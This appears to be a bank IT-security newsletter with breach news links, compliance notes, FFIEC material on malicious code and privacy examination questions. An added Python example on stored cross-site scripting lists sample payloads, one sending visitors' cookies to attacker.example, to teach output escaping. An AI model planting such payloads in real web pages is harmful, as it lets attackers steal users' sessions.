Spending less than 5 minutes a week along
with a cup of coffee, you can monitor your IT
security as required
by the FDIC, OCC, FRB, FFIEC, NCUA, NIST, GLBA, HIPAA, and IT best practices.
For more information visit
http://www.yennik.com/it-review/.
REMINDER - This newsletter is available for Android smartphones and
tablets. Go to the Market Store and search for yennik.
FYI - Can the cloud be safe for banks? - Consider the issues at stake
for the banking industry to implement cloud technology. Here are
some of the possibilities for this security-sensitive industry.
http://www.techrepublic.com/blog/datacenter/can-the-cloud-be-safe-for-banks/5197?tag=nl.e101
FYI - Spies get bonuses to halt Google poachers who pay three times as
much as GCHQ - Spies working at the Government’s communications
headquarters are being offered bonuses worth tens of thousands of
pounds to stop them being poached by corporate giants such as
Microsoft and Google.
http://www.dailymail.co.uk/news/article-2080841/Spies-bonuses-halt-Google-poachers-pay-times-GCHQ.html
FYI - NIST Protects BIOS With New Security Guidelines - The standards body
provides ways to detect changes to the code or configuration of a
PC's startup system. The organization that sets federal technology
standards has provided new security guidelines for protecting the
system that starts up PCs.
http://www.informationweek.com/news/government/security/232301025
FYI - GAO - National Credit Union Administration: Earlier Actions Are
Needed to Better Address Troubled Credit Unions.
http://www.gao.gov/products/GAO-12-247
FYI - Vulnerability allows brute force hacking of wireless routers - A
computing standard that enables users to easily stand up an
encrypted wireless network suffers from a design weakness that could
enable attackers to gain router access, according to US-CERT.
http://www.scmagazine.com/vulnerability-allows-brute-force-hacking-of-wireleless-routers/article/221016/
FYI - Credit Mutuel Units Inspected by French Data Protection Watchdog -
Two Credit Mutuel-CIC units were inspected by France’s data
protection authority following a data system failure reported on
Dec. 28 by weekly newspaper Canard Enchaine, the Paris-based
watchdog said today.
http://www.bloomberg.com/news/2012-01-02/credit-mutuel-units-inspected-by-french-data-protection-watchdog.html
FYI - UK Police Fired Over 'Inappropriate' Facebook Behavior - Cops aren't
above the law when it comes to their behavior on Facebook. Nearly
200 police officers in the United Kingdom have received official
disciplinary action for posting inappropriate photos or comments,
including racist slurs, on Facebook.
http://www.securitynewsdaily.com/uk-police-inappropriate-facebook-behavior-1456/
ATTACKS, INTRUSIONS, DATA THEFT & LOSS
FYI - Stratfor keeps website offline after hack - Security intelligence
firm Stratfor has warned subscribers that its website could stay
offline for a week or more.
http://www.zdnet.co.uk/blogs/mapping-babel-10017967/stratfor-keeps-website-offline-after-hack-10025103/
http://www.bbc.co.uk/news/technology-16352891
FYI - Hacking group releases more Stratfor subscriber data - The data dump
includes 75,000 names and addresses of subscribers to the analysis
service - Hackers released another batch of data on Thursday
pilfered from Stratfor Global Intelligence, a widely used research
and analysis company whose website was attacked last weekend.
http://www.computerworld.com/s/article/9223082/Hacking_group_releases_more_Stratfor_subscriber_data?taxonomyId=17
FYI - Aggressive Phishing Attack Targets Military Personnel - Emails
containing malware, which appear to come from senior officers or
legit companies, have been sent to military personnel during the
holiday season. The U.S. military received an unwanted present this
Christmas holiday season in the form of an "aggressive" phishing
attack that's been making the rounds of .mil email accounts,
according to the Army.
http://www.informationweek.com/news/government/security/232301104
FYI - Cyber Threat to Power Grid Puts Utility Investors at Risk - The
electric-utility industry's concerns about cyber security have
escalated sufficiently for several investor-owned utilities to
include cyber-attacks as a material risk factor in recent filings
with the U.S. Securities and Exchange Commission.
http://www.forbes.com/sites/williampentland/2011/12/27/cyber-threat-to-power-grid-puts-utility-investors-at-risk/
FYI - Gordon Brown's Downing Street emails 'hacked' - Computer crime by
press may be as widespread as phone scandal - Police investigating
computer hacking by private investigators commissioned by national
newspapers have uncovered evidence that emails sent and received by
Gordon Brown during his time as Chancellor were illegally accessed.
http://www.independent.co.uk/news/uk/crime/gordon-browns-downing-street-emails-hacked-6283985.html
FYI - Hackers Expose Details of 15,000 Israeli Credit Cards on Web -
Details from 15,000 Israeli credit card customers have been exposed
by hackers on the Internet, the Bank of Israel said.
http://www.businessweek.com/news/2012-01-04/hackers-expose-details-of-15-000-israeli-credit-cards-on-web.html
FYI - United flyer finds dozens of passengers' info online - Anna just
wanted to check her miles on United Airlines' mobile website, but
instead, she ended up with a whole lot more.
http://www.kvue.com/news/United-Passenger-Finds-dozens-of-account-passengers-info-online--136455568.html
FYI - California union latest Anonymous police victim - Anonymous hackers
affiliated with the group's "AntiSec" initiative struck again over
the New Year's weekend, this time dumping private data they stole by
breaking into the website belonging to the California Statewide Law
Enforcement Association (CSLEA) union.
http://www.scmagazine.com/california-union-latest-anonymous-police-victim/article/221643/?DCMP=EMC-SCUS_Newswire
WEB SITE COMPLIANCE -
Fair Housing Act
A financial institution that advertises on-line credit products that
are subject to the Fair Housing Act must display the Equal Housing
Lender logotype and legend or other permissible disclosure of its
nondiscrimination policy if required by rules of the institution's
regulator.
Home Mortgage Disclosure Act (Regulation C)
The regulations clarify that applications accepted through
electronic media with a video component (the financial institution
has the ability to see the applicant) must be treated as "in person"
applications. Accordingly, information about these applicants' race
or national origin and sex must be collected. An institution that
accepts applications through electronic media without a video
component, for example, the Internet or facsimile, may treat the
applications as received by mail.
INFORMATION TECHNOLOGY SECURITY -
We continue our series on the
FFIEC interagency Information Security Booklet.
MALICIOUS CODE
Malicious code is any program that acts in unexpected and
potentially damaging ways. Common types of malicious code are
viruses, worms, and Trojan horses. The functions of each were once
mutually exclusive; however, developers combined functions to create
more powerful malicious code. Currently malicious code can replicate
itself within a computer and transmit itself between computers.
Malicious code also can change, delete, or insert data, transmit
data outside the institution, and insert backdoors into institution
systems. Malicious code can attack institutions at either the server
or the client level. It can also attack routers, switches, and other
parts of the institution infrastructure. Malicious code can also
monitor users in many ways, such as logging keystrokes, and
transmitting screenshots to the attacker.
Typically malicious code is mobile, using e-mail, Instant
Messenger, and other peer-to-peer (P2P) applications, or active
content attached to Web pages as transmission mechanisms. The code
also can be hidden in programs that are downloaded from the Internet
or brought into the institution on diskette. At times, the malicious
code can be created on the institution's systems either by intruders
or by authorized users. The code can also be introduced to a Web
server in numerous ways, such as entering the code in a response
form on a Web page.
Malicious code does not have to be targeted at the institution to
damage the institution's systems or steal the institution's data.
Most malicious code is general in application, potentially affecting
all Internet users with whatever operating system or application the
code needs to function.
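The last mechanism listed above, code entered through a response form on a Web page, is the one a reviewer most often finds in an institution's own applications. The following Python is an added example and is not text from the FFIEC booklet or from this newsletter: a minimal comment list that stores what visitors submit and renders it back to later visitors, once unsafely and once with the stored text escaped on output. The sample submissions and the attacker.example host are constructed for the example, and the helper names are the example's own.

```python
import html
import re

# Constructed sample submissions: what visitors might type into a feedback
# form.  The second and third are the kind of active content the booklet
# describes; attacker.example is a placeholder host, not a real site.
SUBMISSIONS = [
    "Great service, thanks!",
    '<script>new Image().src="http://attacker.example/?c="+document.cookie</script>',
    '<img src=x onerror="alert(document.domain)">',
]

WRAP_OPEN = '<li class="comment">'
WRAP_CLOSE = "</li>"
# Anything that the browser would parse as a start or end tag.
_TAG_RE = re.compile(r"<[a-zA-Z/][^>]*>")


def render_comment_unsafe(text: str) -> str:
    """Interpolates stored text straight into the page markup.

    Whatever the submitter entered is parsed by the next visitor's browser,
    so a <script> element or an onerror handler becomes code running in
    that visitor's session.
    """
    return f"{WRAP_OPEN}{text}{WRAP_CLOSE}"


def render_comment_safe(text: str) -> str:
    """Escapes the stored text before it is placed in the page.

    html.escape turns <, >, &, " and ' into character references, so the
    browser displays the submitted characters and never treats them as
    tags or attributes.
    """
    return f"{WRAP_OPEN}{html.escape(text, quote=True)}{WRAP_CLOSE}"


def contains_foreign_markup(rendered: str) -> bool:
    """True if anything other than our own wrapper would be parsed as a tag."""
    if not (rendered.startswith(WRAP_OPEN) and rendered.endswith(WRAP_CLOSE)):
        raise ValueError("unexpected wrapper in rendered comment")
    body = rendered[len(WRAP_OPEN):-len(WRAP_CLOSE)]
    return _TAG_RE.search(body) is not None


def build_page(renderer, submissions) -> str:
    """Assembles the comment list the way a naive handler would."""
    return "<ul>\n" + "\n".join(renderer(s) for s in submissions) + "\n</ul>"


def page_is_clean(renderer, submissions) -> bool:
    """Review check: does any stored submission survive as live markup?"""
    return not any(contains_foreign_markup(renderer(s)) for s in submissions)


if __name__ == "__main__":
    for name, renderer in (("unsafe", render_comment_unsafe),
                           ("safe", render_comment_safe)):
        print(f"--- {name} renderer ---")
        print(build_page(renderer, SUBMISSIONS))
        print("free of injected markup:", page_is_clean(renderer, SUBMISSIONS))
```

Run as a script it prints both pages; the unsafe one carries the submitted script to every later visitor, which is the stored form of the "active content attached to Web pages" the booklet names. The check to carry into a code review is the one page_is_clean performs: every value that came in through a form must be escaped for the context it is written into, at the point of output rather than on the way into storage.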
INTERNET PRIVACY - We continue
our series listing the regulatory-privacy examination questions.
When you answer the question each week, you will help ensure
compliance with the privacy regulations.
Sharing nonpublic personal information with nonaffiliated
third parties only under Sections 14 and/or 15.
Note: This module applies only to customers.
A. Disclosure of Nonpublic Personal Information
1) Select a sample of third party relationships with nonaffiliated
third parties and obtain a sample of data shared between the
institution and the third party.
a. Compare the data shared and with whom the data were shared to
ensure that the institution accurately states its information
sharing practices and is not sharing nonpublic personal information
outside the exceptions.
B. Presentation, Content, and Delivery of Privacy Notices
1) Obtain and review the financial institution's initial and annual
notices, as well as any simplified notice that the institution may
use. Note that the institution may only use the simplified notice
when it does not also share nonpublic personal information with
affiliates outside of Section 14 and 15 exceptions. Determine
whether or not these notices:
a. Are clear and conspicuous (§§3(b), 4(a), 5(a)(1));
b. Accurately reflect the policies and practices used by the
institution (§§4(a), 5(a)(1)). Note, this includes practices
disclosed in the notices that exceed regulatory requirements; and
c. Include, and adequately describe, all required items of
information (§6).
2) Through discussions with management, review of the institution's
policies and procedures, and a sample of electronic or written
customer records where available, determine if the institution has
adequate procedures in place to provide notices to customers, as
appropriate. Assess the following:
a. Timeliness of delivery (§§4(a), 4(d), 4(e), 5(a)); and
b. Reasonableness of the method of delivery (e.g., by hand; by
mail; electronically, if the customer agrees; or as a necessary step
of a transaction) (§9) and accessibility of or ability to retain the
notice (§9(e)).